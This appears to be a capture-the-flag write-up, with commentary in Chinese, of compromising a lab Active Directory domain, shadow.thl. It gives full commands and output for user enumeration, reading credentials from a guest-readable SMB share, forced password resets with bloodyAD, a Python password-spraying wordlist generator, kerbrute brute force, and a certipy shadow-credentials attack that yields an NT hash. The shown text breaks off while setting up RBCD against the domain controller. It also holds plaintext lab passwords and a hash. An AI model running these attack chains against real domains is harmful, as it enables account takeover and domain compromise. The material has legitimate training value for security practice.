Nmap
[/home/kali/temp]$ cat nmap.result
# Nmap 7.95 scan initiated Sun Jul 12 10:00:50 2026 as: /usr/lib/nmap/nmap -A -p- -oN nmap.result 192.168.237.138
Nmap scan report for 192.168.237.138
Host is up (0.00049s latency).
Not shown: 65514 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-07-12 02:02:41Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: shadow.thl, Site: Default-First-Site-Name)
|_ssl-date: 2026-07-12T02:04:13+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=Seerver.shadow.thl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:Seerver.shadow.thl
| Not valid before: 2026-06-21T22:08:16
|_Not valid after: 2027-06-21T22:08:16
445/tcp open microsoft-ds Windows Server 2016 Standard Evaluation 14393 microsoft-ds (workgroup: SHADOW)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: shadow.thl, Site: Default-First-Site-Name)
|_ssl-date: 2026-07-12T02:04:13+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=Seerver.shadow.thl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:Seerver.shadow.thl
| Not valid before: 2026-06-21T22:08:16
|_Not valid after: 2027-06-21T22:08:16
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: shadow.thl, Site: Default-First-Site-Name)
|_ssl-date: 2026-07-12T02:04:13+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=Seerver.shadow.thl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:Seerver.shadow.thl
| Not valid before: 2026-06-21T22:08:16
|_Not valid after: 2027-06-21T22:08:16
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: shadow.thl, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=Seerver.shadow.thl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:Seerver.shadow.thl
| Not valid before: 2026-06-21T22:08:16
|_Not valid after: 2027-06-21T22:08:16
|_ssl-date: 2026-07-12T02:04:13+00:00; 0s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49685/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49686/tcp open msrpc Microsoft Windows RPC
49688/tcp open msrpc Microsoft Windows RPC
49704/tcp open msrpc Microsoft Windows RPC
57914/tcp open msrpc Microsoft Windows RPC
58794/tcp open msrpc Microsoft Windows RPC
MAC Address: 00:0C:29:16:42:DB (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 2016|10|2012|2022|Phone|7 (97%)
OS CPE: cpe:/o:microsoft:windows_server_2016 cpe:/o:microsoft:windows_10 cpe:/o:microsoft:windows_server_2012:r2 cpe:/o:microsoft:windows_server_2022 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_7
Aggressive OS guesses: Microsoft Windows Server 2016 (97%), Microsoft Windows 10 1607 (91%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (91%), Microsoft Windows Server 2012 R2 (91%), Microsoft Windows Server 2022 (91%), Microsoft Windows Phone 7.5 or 8.0 (88%), Microsoft Windows Embedded Standard 7 (87%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: Host: SEERVER; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-os-discovery:
| OS: Windows Server 2016 Standard Evaluation 14393 (Windows Server 2016 Standard Evaluation 6.3)
| Computer name: Seerver
| NetBIOS computer name: SEERVER\x00
| Domain name: shadow.thl
| Forest name: shadow.thl
| FQDN: Seerver.shadow.thl
|_ System time: 2026-07-11T19:03:33-07:00
| smb2-time:
| date: 2026-07-12T02:03:33
|_ start_date: 2026-07-12T01:52:20
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
|_nbstat: NetBIOS name: SEERVER, NetBIOS user: <unknown>, NetBIOS MAC: 00:0c:29:16:42:db (VMware)
|_clock-skew: mean: 59m59s, deviation: 2h38m44s, median: 0s
TRACEROUTE
HOP RTT ADDRESS
1 0.49 ms 192.168.237.138
UserEnum
[/home/kali/temp]$ kerbrute userenum -d shadow.thl --dc 192.168.237.138 /usr/share/seclists/Usernames/xato-net-10-million-usernames-dup.txt
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 07/12/26 - Ronnie Flathers @ropnop
2026/07/12 10:30:45 > Using KDC(s):
2026/07/12 10:30:45 > 192.168.237.138:88
2026/07/12 10:30:45 > [+] VALID USERNAME: shadow@shadow.thl
2026/07/12 10:30:45 > [+] VALID USERNAME: guest@shadow.thl
2026/07/12 10:30:45 > [+] VALID USERNAME: Shadow@shadow.thl
2026/07/12 10:30:45 > [+] VALID USERNAME: jsmith@shadow.thl
2026/07/12 10:30:45 > [+] VALID USERNAME: administrator@shadow.thl
2026/07/12 10:30:46 > [+] VALID USERNAME: SHADOW@shadow.thl
2026/07/12 10:30:46 > [+] VALID USERNAME: Guest@shadow.thl
2026/07/12 10:30:46 > [+] VALID USERNAME: Administrator@shadow.thl
2026/07/12 10:30:47 > [+] VALID USERNAME: helpdesk@shadow.thl
2026/07/12 10:30:49 > [+] VALID USERNAME: GUEST@shadow.thl
2026/07/12 10:30:50 > [+] VALID USERNAME: JSmith@shadow.thl
2026/07/12 10:30:58 > [+] VALID USERNAME: Jsmith@shadow.thl
2026/07/12 10:31:10 > [+] VALID USERNAME: itsupport@shadow.thl
2026/07/12 10:31:21 > [+] VALID USERNAME: JSMITH@shadow.thl
2026/07/12 10:31:27 > Done! Tested 624370 usernames (14 valid) in 42.334 seconds
SMB - Get User(shadow) Password
用 smbmap 可以通过 guest 查看到 Incidents 目录
[/home/kali/temp]$ smbmap -H 192.168.237.138 -u guest
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.5 | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 1 authenticated session(s)
[+] IP: 192.168.237.138:445 Name: shadow.thl Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
DataRecovery NO ACCESS
Incidents READ ONLY
IPC$ READ ONLY Remote IPC
NETLOGON NO ACCESS Logon server share
SYSVOL NO ACCESS Logon server share
[*] Closed 1 connections
里面有一个 Support.txt ,将其下载下来
[/home/kali/temp]$ smbmap -H 192.168.237.138 -u guest -r Incidents
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.5 | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 1 authenticated session(s)
[+] IP: 192.168.237.138:445 Name: shadow.thl Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
DataRecovery NO ACCESS
Incidents READ ONLY
./Incidents
dr--r--r-- 0 Thu Jun 18 07:21:45 2026 .
dr--r--r-- 0 Thu Jun 18 07:21:45 2026 ..
fr--r--r-- 1134 Fri Jun 19 00:49:29 2026 Support.txt
IPC$ READ ONLY Remote IPC
NETLOGON NO ACCESS Logon server share
SYSVOL NO ACCESS Logon server share
[*] Closed 1 connections
[/home/kali/temp]$ smbmap -H 192.168.237.138 -u guest --download Incidents/Support.txt
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.5 | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 1 authenticated session(s)
[+] Starting download: Incidents\Support.txt (1134 bytes)
[+] File output to: /home/kali/temp/192.168.237.138-Incidents_Support.txt
[*] Closed 1 connections
在 Support.txt 中发现 shadow 用户的密码
[/home/kali/temp]$ cat 192.168.237.138-Incidents_Support.txt
IT: Hello, IT Support. Who am I speaking with?
Employee: Hi, this is Shadow.
IT: Perfect, Shadow. I'm reviewing your password reset request. Could you please confirm your corporate username?
Employee: Yes, shadow@shadow.thl.
IT: Thank you. To verify your identity, can you confirm your department or internal extension?
Employee: Security Department, extension 3107.
IT: Perfect, that matches our records. I�m going to proceed with resetting your Active Directory password for the shadow.thl domain.
(pause while the password is being reset)
IT: Done, Shadow. I�ve generated your temporary password.
Employee: What�s the new password?
IT: Your temporary password is:
)*7UbH5\,:K(91lD9W0RN+e
I recommend logging in as soon as possible and changing it immediately to a new password that only you know.
Employee: Understood.
IT: Perfect. Please remember that this is a temporary password for the shadow.thl domain and it may expire if you do not change it shortly. If you experience any issues, please contact IT Support.
Employee: Alright, thank you.
IT: You�re welcome. Have a great day.
Bloodhound
用 bloodhound 做一下信息收集
[/home/kali/temp]$ bloodhound-python -d shadow.thl -u shadow -p ')*7UbH5\,:K(91lD9W0RN+e' -c All -ns 192.168.237.138 --zip
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: shadow.thl
INFO: Getting TGT for user
INFO: Connecting to LDAP server: Seerver.shadow.thl
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: Seerver.shadow.thl
INFO: Found 14 users
INFO: Found 61 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: Seerver.shadow.thl
INFO: Done in 00M 00S
INFO: Compressing output into 20260712103321_bloodhound.zip
Own User(secadmin)
然后查看 shadow 用户的权限,完全掌控 secadmin 用户
直接修改密码
[/home/kali/temp]$ bloodyAD --dc 192.168.237.138 -d shadow.thl -u shadow -p ')*7UbH5\,:K(91lD9W0RN+e' set password SECADMIN 'Hyh123@'
[+] Password changed successfully!
Own User(svc_backup)
再查看 secadmin 可以强制修改 svc_backup 用户的密码
[/home/kali/temp]$ bloodyAD --dc 192.168.237.138 -d shadow.thl -u SECADMIN -p 'Hyh123@' set password svc_backup 'Hyh123@'
[+] Password changed successfully!
SMB - Get Password Policy
查看 svc_backup 用户的所属组,发现有一个 DATARECOVERY,在之前 SMB 的目录里也有一个
查看发现有一个 pdf 文件
[/home/kali/temp]$ smbmap -H 192.168.237.138 -u svc_backup -p 'Hyh123@' -r DataRecovery
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.5 | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 1 authenticated session(s)
[+] IP: 192.168.237.138:445 Name: shadow.thl Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
DataRecovery READ ONLY
./DataRecovery
dr--r--r-- 0 Sun Jun 21 02:23:32 2026 .
dr--r--r-- 0 Sun Jun 21 02:23:32 2026 ..
fr--r--r-- 20019 Sun Jun 21 02:23:32 2026 Red Team Internal Report 2026.pdf
Incidents NO ACCESS
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
SYSVOL READ ONLY Logon server share
[*] Closed 1 connections
将其下载下来
[/home/kali/temp]$ smbmap -H 192.168.237.138 -u svc_backup -p 'Hyh123@' --download DataRecovery/'Red Team Internal Report 2026.pdf'
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.5 | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 1 authenticated session(s)
[+] Starting download: DataRecovery\Red Team Internal Report 2026.pdf (20019 bytes)
[+] File output to: /home/kali/temp/192.168.237.138-DataRecovery_Red Team Internal Report 2026.pdf
[*] Closed 1 connections
内容如下
Internal Red Team Report 2026
Password Policy Assessment
SHADOWS.THL
Executive Summary
During adversary simulation activities conducted by the Red Team in the
SHADOWS.THL environment, several weaknesses related to password management and
usage within the organization were identified. These weaknesses significantly
increase the risk of unauthorized access to corporate systems, directly
impacting the confidentiality, integrity, and availability of information. The
tests performed showed that current password policies allow scenarios
susceptible to brute-force attacks, password spraying, credential reuse, and
compromise of privileged accounts. Additionally, credential construction
patterns were observed that could facilitate password prediction in controlled
attack simulation scenarios.
Scope
Active Directory user accounts in SHADOWS.THL
Internal services authenticated via corporate credentials
Internal web applications
Remote access (VPN / RDP / SSH where applicable)
Administration platforms and management systems
Domain policies related to authentication and account lockout
Findings
1. Insufficient Password Complexity
It was identified that a significant portion of users employ passwords based on
predictable patterns.
Among the most common patterns observed:
Organization name or variations of it
Use of the internal domain (shadows.thl / SHADOWS / shadow)
Seasons of the year
Months of the year
Current or recent years
Simple character substitutions (e.g., a → @, o → 0)
Observed examples:
Shadow2025!
Shadows.Thl2024!
Verano2025!
Password123!
Risk: High
An attacker could compromise multiple accounts through password spraying attacks
using combinations derived from organizational patterns and common password
lists.
Password BruteForce
大致的意思就是说密码是有规律的,因此让 AI 给我写了一个生成脚本
import itertools
# --- 基础词根:组织名称及变体 ---
org_bases = [
"Shadow", "Shadows", "shadow", "shadows",
"ShadowsThl", "Shadows.Thl", "ShadowThl", "Shadow.Thl",
"SHADOWS", "SHADOW"
]
# --- 季节 (西语/英语均包含,报告中出现了Verano) ---
seasons = [
"Verano", "Invierno", "Otono", "Primavera", # 西语季节
"Summer", "Winter", "Autumn", "Spring" # 英语季节
]
# --- 月份 ---
months = [
"Enero","Febrero","Marzo","Abril","Mayo","Junio",
"Julio","Agosto","Septiembre","Octubre","Noviembre","Diciembre",
"January","February","March","April","May","June",
"July","August","September","October","November","December"
]
# --- 常见基础词 ---
common_words = ["Password", "Welcome", "Admin", "Login", "Corp", "Company"]
# --- 年份范围 ---
years = [str(y) for y in range(2022, 2027)]
# --- 常见结尾符号/后缀 ---
suffixes = ["!", "!!", "#", "@", "123", "1!", "2024!", "2025!"]
def leetspeak_variants(word):
"""生成简单字符替换变体 (a->@, o->0, i->1, e->3, s->$)"""
subs = {'a':'@','A':'@','o':'0','O':'0','i':'1','I':'1','e':'3','E':'3','s':'$','S':'$'}
variants = {word}
for char, repl in subs.items():
if char in word:
variants.add(word.replace(char, repl))
return variants
wordlist = set()
base_words = org_bases + seasons + months + common_words
for word in base_words:
for variant in leetspeak_variants(word):
# 词根 + 年份 + 后缀
for year in years:
for suf in suffixes:
wordlist.add(f"{variant}{year}{suf}")
# 词根 + 后缀 (无年份)
for suf in suffixes:
wordlist.add(f"{variant}{suf}")
# 词根单独 + 年份
for year in years:
wordlist.add(f"{variant}{year}")
# 组织名 + 季节/月份 组合
for org in org_bases:
for s in seasons + months:
for year in years:
wordlist.add(f"{org}{s}{year}!")
wordlist.add(f"{org}.{s}{year}!")
# 报告中明确提到的示例(保留原样确保覆盖)
wordlist.update([
"Shadow2025!", "Shadows.Thl2024!", "Verano2025!", "Password123!"
])
sorted_list = sorted(wordlist)
with open("shadows_thl_weak_passwords.txt", "w") as f:
f.write("\n".join(sorted_list))
print(f"生成密码条目数: {len(sorted_list)}")
成功爆破到 helpdesk 用户的密码
[/home/kali/temp]$ kerbrute bruteuser -d shadow.thl --dc 192.168.237.138 shadows_thl_weak_passwords.txt helpdesk
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 07/12/26 - Ronnie Flathers @ropnop
2026/07/12 10:52:41 > Using KDC(s):
2026/07/12 10:52:41 > 192.168.237.138:88
2026/07/12 10:53:00 > [+] VALID LOGIN: helpdesk@shadow.thl:Shadows.Thl2026@
2026/07/12 10:53:00 > Done! Tested 8811 logins (1 successes) in 18.905 seconds
Shadow Credentials - Own User(auditmgr)
helpdesk 用户对 auditmgr 有 GenericWrite 权限
通过 certipy 工具拿到 NT hash
[/home/kali/temp]$ certipy shadow auto -u 'helpdesk@shadow.thl' -p 'Shadows.Thl2026@' -account 'AUDITMGR' -dc-ip 192.168.237.138
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Targeting user 'auditmgr'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID 'cd49fc43-04c6-8989-436c-3d4982cf5932'
[*] Adding Key Credential with device ID 'cd49fc43-04c6-8989-436c-3d4982cf5932' to the Key Credentials for 'auditmgr'
[*] Successfully added Key Credential with device ID 'cd49fc43-04c6-8989-436c-3d4982cf5932' to the Key Credentials for 'auditmgr'
[*] Authenticating as 'auditmgr' with the certificate
[*] Certificate identities:
[*] No identities found in this certificate
[*] Using principal: 'auditmgr@shadow.thl'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'auditmgr.ccache'
[*] Wrote credential cache to 'auditmgr.ccache'
[*] Trying to retrieve NT hash for 'auditmgr'
[*] Restoring the old Key Credentials for 'auditmgr'
[*] Successfully restored the old Key Credentials for 'auditmgr'
[*] NT hash for 'auditmgr': 98019215ea3bcb223dacec8fc12a71aa
RBCD
RBCD 是 Windows Server 2012 引入的一种委派机制,允许资源自己决定“谁能冒充别人来访问我”。
再看看 auditmgr 的权限,可以将自己加入到 PLATFORMENGINEERING 组,同时完全控制 SEERVER.SHADOW.THL
这个 SEERVER.SHADOW.THL 是个计算机,同时也是域控
[/home/kali/temp]$ bloodyAD --dc 192.168.237.138 -d shadow.thl -u SECADMIN -p 'Hyh123@' get object "CN=SEERVER,OU=DOMAIN CONTROLLERS,DC=shadow,DC=THL"
distinguishedName: CN=SEERVER,OU=Domain Controllers,DC=shadow,DC=thl
accountExpires: 9999-12-31 23:59:59.999999+00:00
badPasswordTime: 1601-01-01 00:00:00+00:00
badPwdCount: 0
cn: SEERVER
codePage: 0
countryCode: 0
dNSHostName: Seerver.shadow.thl
dSCorePropagationData: 2026-06-23 20:55:44+00:00
displayName: SEERVER$
instanceType: 4
isCriticalSystemObject: True
lastLogoff: 1601-01-01 00:00:00+00:00
lastLogon: 2026-07-12 02:20:15.273752+00:00
lastLogonTimestamp: 2026-07-12 01:52:50.722146+00:00
localPolicyFlags: 0
logonCount: 108
memberOf: CN=Pre-Windows 2000 Compatible Access,CN=Builtin,DC=shadow,DC=thl; CN=Cert Publishers,CN=Users,DC=shadow,DC=thl
msDFSR-ComputerReferenceBL: CN=WIN-QVIKQRQTP3G,CN=Topology,CN=Domain System Volume,CN=DFSR-GlobalSettings,CN=System,DC=shadow,DC=thl
msDS-AdditionalDnsHostName: WIN-QVIKQRQTP3G$; SEERVER$
msDS-GenerationId: /LEsAV8EWfk=
msDS-SupportedEncryptionTypes: 28
nTSecurityDescriptor: O:S-1-5-21-2560516159-2044954141-282354372-512G:S-1-5-21-2560516159-2044954141-282354372-512D:AI(OA;;0x30;bf967a7f-0de6-11d0-a285-00aa003049e2;;S-1-5-21-2560516159-2044954141-282354372-517)(OA;;0x3;bf967aa8-0de6-11d0-a285-00aa003049e2;;S-1-5-32-550)(OA;;RP;46a9b11d-60ae-405a-b7e8-ff8a58d456d2;;S-1-5-32-560)(OA;;CR;ab721a53-1e2f-11d0-9819-00aa0040529b;;S-1-1-0)(OA;;SW;72e39547-7b18-11d1-adef-00c04fd8d5cd;;S-1-5-10)(OA;;SW;f3a64788-5306-11d1-a9c5-0000f80367c1;;S-1-5-10)(OA;;0x30;77b5b886-944a-11d1-aebd-0000f80367c1;;S-1-5-10)(A;;0xf01ff;;;S-1-5-21-2560516159-2044954141-282354372-512)(A;;0xf01ff;;;S-1-5-21-2560516159-2044954141-282354372-1112)(A;;0x3;;;S-1-5-10)(A;;0x20094;;;S-1-5-11)(A;;0xf01ff;;;S-1-5-18)(OA;CIIOID;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;S-1-5-32-554)(OA;CIIOID;RP;4c164200-20c0-11d0-a768-00aa006e0529;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-32-554)(OA;CIIOID;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;S-1-5-32-554)(OA;CIIOID;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-32-554)(OA;CIIOID;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;S-1-5-32-554)(OA;CIIOID;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-32-554)(OA;CIIOID;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;S-1-5-32-554)(OA;CIIOID;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-32-554)(OA;CIIOID;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;S-1-5-32-554)(OA;CIIOID;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-32-554)(OA;CIID;0x30;5b47d60f-6090-40b2-9f37-2a4de88f3063;;S-1-5-21-2560516159-2044954141-282354372-526)(OA;CIID;0x30;5b47d60f-6090-40b2-9f37-2a4de88f3063;;S-1-5-21-2560516159-2044954141-282354372-527)(OA;ID;SW;9b026da6-0d3c-465c-8bee-5199d7165cba;;S-1-5-21-2560516159-2044954141-282354372-512)(OA;CIIOID;SW;9b026da6-0d3c-465c-8bee-5199d7165cba;bf967a86-0de6-11d0-a285-00aa003049e2;S-1-3-0)(OA;CIID;SW;9b026da6-0d3c-465c-8bee-5199d7165cba;bf967a86-0de6-11d0-a285-00aa003049e2;S-1-5-10)(OA;CIID;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;S-1-5-9)(OA;CIIOID;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;S-1-5-9)(OA;CIIOID;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-9)(OA;CIID;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;S-1-5-10)(OA;CIIOID;0x20094;;4828cc14-1437-45bc-9b07-ad6f015e5f28;S-1-5-32-554)(OA;CIIOID;0x20094;;bf967a9c-0de6-11d0-a285-00aa003049e2;S-1-5-32-554)(OA;CIIOID;0x20094;;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-32-554)(OA;OICIID;0x30;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;S-1-5-10)(OA;CIID;0x130;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;S-1-5-10)(A;CIID;0xf01ff;;;S-1-5-21-2560516159-2044954141-282354372-519)(A;CIID;LC;;;S-1-5-32-554)(A;CIID;0xf01bd;;;S-1-5-32-544)
name: SEERVER
objectCategory: CN=Computer,CN=Schema,CN=Configuration,DC=shadow,DC=thl
objectClass: top; person; organizationalPerson; user; computer
objectGUID: d4361ecb-b6d6-4919-9c06-d3ccd177d228
objectSid: S-1-5-21-2560516159-2044954141-282354372-1000
operatingSystem: Windows Server 2016 Standard Evaluation
operatingSystemVersion: 10.0 (14393)
primaryGroupID: 516
pwdLastSet: 2026-06-15 11:44:18.961220+00:00
rIDSetReferences: CN=RID Set,CN=SEERVER,OU=Domain Controllers,DC=shadow,DC=thl
sAMAccountName: SEERVER$
sAMAccountType: 805306369
serverReferenceBL: CN=SEERVER,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=shadow,DC=thl
servicePrincipalName: Dfsr-12F9A27C-BF97-4787-9364-D31B6C55EB04/Seerver.shadow.thl; ldap/WIN-QVIKQRQTP3G/SHADOW; HOST/WIN-QVIKQRQTP3G/shadow.thl; ldap/WIN-QVIKQRQTP3G/ForestDnsZones.shadow.thl; HOST/WIN-QVIKQRQTP3G/SHADOW; ldap/SEERVER/ForestDnsZones.shadow.thl; ldap/WIN-QVIKQRQTP3G/DomainDnsZones.shadow.thl; HOST/SEERVER/shadow.thl; ldap/SEERVER/DomainDnsZones.shadow.thl; GC/SEERVER/shadow.thl; ldap/WIN-QVIKQRQTP3G/shadow.thl; GC/WIN-QVIKQRQTP3G/shadow.thl; ldap/SEERVER/shadow.thl; RestrictedKrbHost/WIN-QVIKQRQTP3G; HOST/WIN-QVIKQRQTP3G; ldap/WIN-QVIKQRQTP3G; HOST/SEERVER/SHADOW; ldap/SEERVER/SHADOW; ldap/Seerver.shadow.thl/ForestDnsZones.shadow.thl; ldap/Seerver.shadow.thl/DomainDnsZones.shadow.thl; DNS/Seerver.shadow.thl; GC/Seerver.shadow.thl/shadow.thl; RestrictedKrbHost/Seerver.shadow.thl; RestrictedKrbHost/SEERVER; HOST/Seerver.shadow.thl/SHADOW; HOST/SEERVER; HOST/Seerver.shadow.thl; HOST/Seerver.shadow.thl/shadow.thl; ldap/Seerver.shadow.thl/SHADOW; ldap/SEERVER; ldap/Seerver.shadow.thl; ldap/Seerver.shadow.thl/shadow.thl; RPC/1eb439e6-4337-4d07-8293-605aa7ed7ecb._msdcs.shadow.thl; E3514235-4B06-11D1-AB04-00C04FC2DCD2/1eb439e6-4337-4d07-8293-605aa7ed7ecb/shadow.thl; ldap/1eb439e6-4337-4d07-8293-605aa7ed7ecb._msdcs.shadow.thl
uSNChanged: 61468
uSNCreated: 12293
userAccountControl: SERVER_TRUST_ACCOUNT; TRUSTED_FOR_DELEGATION
